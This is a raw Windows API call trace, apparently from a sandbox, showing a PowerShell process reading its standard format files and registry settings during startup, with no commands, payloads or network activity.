	[0342.388] ReadFile (in: hFile=0x2d0, lpBuffer=0x2e72b50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e72b50*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.388] ReadFile (in: hFile=0x2d0, lpBuffer=0x2e72b50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e72b50*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.388] ReadFile (in: hFile=0x2d0, lpBuffer=0x2e72b50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e72b50*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.388] ReadFile (in: hFile=0x2d0, lpBuffer=0x2e72b50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e72b50*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.389] ReadFile (in: hFile=0x2d0, lpBuffer=0x2e72b50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e72b50*, lpNumberOfBytesRead=0x1acdb8*=0x119, lpOverlapped=0x0) returned 1
	[0342.389] ReadFile (in: hFile=0x2d0, lpBuffer=0x2e72b50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e72b50*, lpNumberOfBytesRead=0x1acdb8*=0x0, lpOverlapped=0x0) returned 1
	[0342.389] CloseHandle (hObject=0x2d0) returned 1
	[0342.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0342.389] SetErrorMode (uMode=0x1) returned 0x1
	[0342.389] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1acd60 | out: lpFileInformation=0x1acd60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0342.389] SetErrorMode (uMode=0x1) returned 0x1
	[0342.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0342.390] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ace48 | out: phkResult=0x1ace48*=0x2d0) returned 0x0
	[0342.390] RegQueryValueExW (in: hKey=0x2d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acdcc, lpData=0x0, lpcbData=0x1acdc8*=0x0 | out: lpType=0x1acdcc*=0x1, lpData=0x0, lpcbData=0x1acdc8*=0x56) returned 0x0
	[0342.390] CoTaskMemAlloc (cb=0x5a) returned 0x1b8140b0
	[0342.390] RegQueryValueExW (in: hKey=0x2d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acd9c, lpData=0x1b8140b0, lpcbData=0x1acd98*=0x56 | out: lpType=0x1acd9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1acd98*=0x56) returned 0x0
	[0342.390] CoTaskMemFree (pv=0x1b8140b0) 
	[0342.390] RegCloseKey (hKey=0x2d0) returned 0x0
	[0342.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0342.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ac940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0342.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.391] VirtualQuery (in: lpAddress=0x1ab8e0, lpBuffer=0x1ac7a0, dwLength=0x30 | out: lpBuffer=0x1ac7a0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0342.391] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x34de7597, Data2=0xfcd5, Data3=0x4ab2, Data4=([0]=0xb6, [1]=0x6c, [2]=0xef, [3]=0x14, [4]=0xcf, [5]=0xf3, [6]=0x7b, [7]=0x62))) returned 0x0
	[0342.391] VirtualQuery (in: lpAddress=0x1aba20, lpBuffer=0x1ac8e0, dwLength=0x30 | out: lpBuffer=0x1ac8e0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0342.392] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x3ef491dc, Data2=0xc508, Data3=0x4e5d, Data4=([0]=0x9f, [1]=0xc5, [2]=0x42, [3]=0xef, [4]=0xa, [5]=0xb0, [6]=0x2f, [7]=0xb6))) returned 0x0
	[0342.392] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x23455b69, Data2=0x9a67, Data3=0x4954, Data4=([0]=0x8c, [1]=0x86, [2]=0xf7, [3]=0x97, [4]=0x60, [5]=0xa, [6]=0x52, [7]=0xf9))) returned 0x0
	[0342.392] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xa047d06a, Data2=0xce00, Data3=0x4af0, Data4=([0]=0xab, [1]=0x69, [2]=0xa9, [3]=0x8a, [4]=0xed, [5]=0x4, [6]=0x1b, [7]=0xef))) returned 0x0
	[0342.392] VirtualQuery (in: lpAddress=0x1aba20, lpBuffer=0x1ac8e0, dwLength=0x30 | out: lpBuffer=0x1ac8e0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0342.392] VirtualQuery (in: lpAddress=0x1aba20, lpBuffer=0x1ac8e0, dwLength=0x30 | out: lpBuffer=0x1ac8e0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0342.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ac830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0342.393] SetErrorMode (uMode=0x1) returned 0x1
	[0342.393] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2d0
	[0342.393] GetFileType (hFile=0x2d0) returned 0x1
	[0342.393] SetErrorMode (uMode=0x1) returned 0x1
	[0342.393] GetFileType (hFile=0x2d0) returned 0x1
	[0342.393] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.394] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.394] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.394] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.394] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.394] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.395] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.395] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.396] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.396] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.396] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.397] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.397] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.397] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.397] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.398] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.399] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.399] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.399] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.400] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.400] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.400] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.400] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.401] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.401] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.401] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.401] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.401] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.402] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.402] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.402] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.402] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.405] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.405] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.405] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.405] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.406] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.406] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.406] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.406] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.407] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.407] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.407] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.407] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.409] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.409] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.409] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.409] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.409] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.410] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.410] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.410] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.410] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.411] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.411] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.411] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.411] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.412] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.412] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.412] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.412] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.412] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0342.412] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0xf37, lpOverlapped=0x0) returned 1
